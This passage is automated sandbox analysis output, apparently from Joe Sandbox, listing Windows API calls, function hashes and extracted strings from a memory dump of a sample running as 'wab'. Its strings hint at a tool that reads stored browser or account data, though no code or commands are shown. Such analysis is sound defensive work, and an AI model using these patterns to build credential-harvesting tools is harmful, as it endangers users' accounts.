                  • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                  • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                  • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                  • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                  • wcscpy.MSVCRT ref: 0040D1B5
                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                  • wcslen.MSVCRT ref: 0040D1D3
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                  • memcpy.MSVCRT ref: 0040D24C
                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                  • String ID: strings
                  • API String ID: 3166385802-3030018805
                  • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                  • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                  APIs
                  • memset.MSVCRT ref: 00411AF6
                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                  • wcsrchr.MSVCRT ref: 00411B14
                  • wcscat.MSVCRT ref: 00411B2E
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileModuleNamememsetwcscatwcsrchr
                  • String ID: AE$.cfg$General$EA
                  • API String ID: 776488737-1622828088
                  • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                  • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                  • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                  • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                  APIs
                  • memset.MSVCRT ref: 0040D8BD
                  • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                  • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                  • memset.MSVCRT ref: 0040D906
                  • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                  • _wcsicmp.MSVCRT ref: 0040D92F
                    • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                    • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                  • String ID: sysdatetimepick32
                  • API String ID: 1028950076-4169760276
                  • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                  • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                  • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                  • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID: -journal$-wal
                  • API String ID: 438689982-2894717839
                  • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                  • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                  • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                  • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                  • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                  • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                  • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                  • EndDialog.USER32(?,00000002), ref: 00405C83
                  • EndDialog.USER32(?,00000001), ref: 00405C98
                    • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                    • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                  • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Item$Dialog$MessageSend
                  • String ID:
                  • API String ID: 3975816621-0
                  • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                  • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                  • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                  • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                  APIs
                  • _wcsicmp.MSVCRT ref: 00444D09
                  • _wcsicmp.MSVCRT ref: 00444D1E
                  • _wcsicmp.MSVCRT ref: 00444D33
                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp$wcslen$_memicmp
                  • String ID: .save$http://$https://$log profile$signIn
                  • API String ID: 1214746602-2708368587
                  • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                  • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                  • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                  • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                  • String ID:
                  • API String ID: 2313361498-0
                  • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                  • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                  • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                  • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                  APIs
                  • GetClientRect.USER32(?,?), ref: 00405F65
                  • GetWindow.USER32(?,00000005), ref: 00405F7D
                  • GetWindow.USER32(00000000), ref: 00405F80
                    • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                  • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                  • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                  • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$ItemMessageRectSend$Client
                  • String ID:
                  • API String ID: 2047574939-0
                  • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                  • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                  • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                  • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                  • String ID:
                  • API String ID: 4218492932-0
                  • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                  • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                  • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                  • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                  APIs
                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                  • memcpy.MSVCRT ref: 0044A8BF
                  • memcpy.MSVCRT ref: 0044A90C
                  • memcpy.MSVCRT ref: 0044A988
                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                  • memcpy.MSVCRT ref: 0044A9D8
                  • memcpy.MSVCRT ref: 0044AA19
                  • memcpy.MSVCRT ref: 0044AA4A
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID: gj
                  • API String ID: 438689982-4203073231
                  • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                  • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                  • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                  • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                  • API String ID: 3510742995-2446657581
                  • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                  • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                  • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                  • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                  • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                  • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                  • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                  • memset.MSVCRT ref: 00405ABB
                  • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                  • SetFocus.USER32(?), ref: 00405B76
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$FocusItemmemset
                  • String ID:
                  • API String ID: 4281309102-0
                  • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                  • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                  • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                  • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintfwcscat
                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                  • API String ID: 384018552-4153097237
                  • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                  • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                  • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                  • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ItemMenu$CountInfomemsetwcschr
                  • String ID: 0$6
                  • API String ID: 2029023288-3849865405
                  • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                  • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                  • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                  • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                  APIs
                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                  • memset.MSVCRT ref: 00405455
                  • memset.MSVCRT ref: 0040546C
                  • memset.MSVCRT ref: 00405483
                  • memcpy.MSVCRT ref: 00405498
                  • memcpy.MSVCRT ref: 004054AD
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$memcpy$ErrorLast
                  • String ID: 6$\
                  • API String ID: 404372293-1284684873
                  • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                  • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                  • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                  • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                  APIs
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                  • wcscpy.MSVCRT ref: 0040A0D9
                  • wcscat.MSVCRT ref: 0040A0E6
                  • wcscat.MSVCRT ref: 0040A0F5
                  • wcscpy.MSVCRT ref: 0040A107
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                  • String ID:
                  • API String ID: 1331804452-0
                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                  APIs
                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                  • String ID: advapi32.dll
                  • API String ID: 2012295524-4050573280
                  • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                  • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                  • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                  • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                  APIs
                  Strings
                  • <?xml version="1.0" ?>, xrefs: 0041007C
                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                  • <%s>, xrefs: 004100A6
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_snwprintf
                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                  • API String ID: 3473751417-2880344631
                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscat$_snwprintfmemset
                  • String ID: %2.2X
                  • API String ID: 2521778956-791839006
                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintfwcscpy
                  • String ID: dialog_%d$general$menu_%d$strings
                  • API String ID: 999028693-502967061
                  • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                  • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                  • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                  • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memsetstrlen
                  • String ID:
                  • API String ID: 2350177629-0
                  • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                  • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                  • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                  • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                  • API String ID: 2221118986-1606337402
                  • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                  • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                  • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                  • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmpmemset$_mbscpymemcpystrlen
                  • String ID:
                  • API String ID: 265355444-0
                  • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                  • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                  • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                  • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                  APIs
                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                    • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                    • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                  • memset.MSVCRT ref: 0040C439
                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                  • _wcsupr.MSVCRT ref: 0040C481
                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                  • memset.MSVCRT ref: 0040C4D0
                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                  • String ID:
                  • API String ID: 1973883786-0
                  • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                  • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                  • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                  • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                  APIs
                  • memset.MSVCRT ref: 004116FF
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
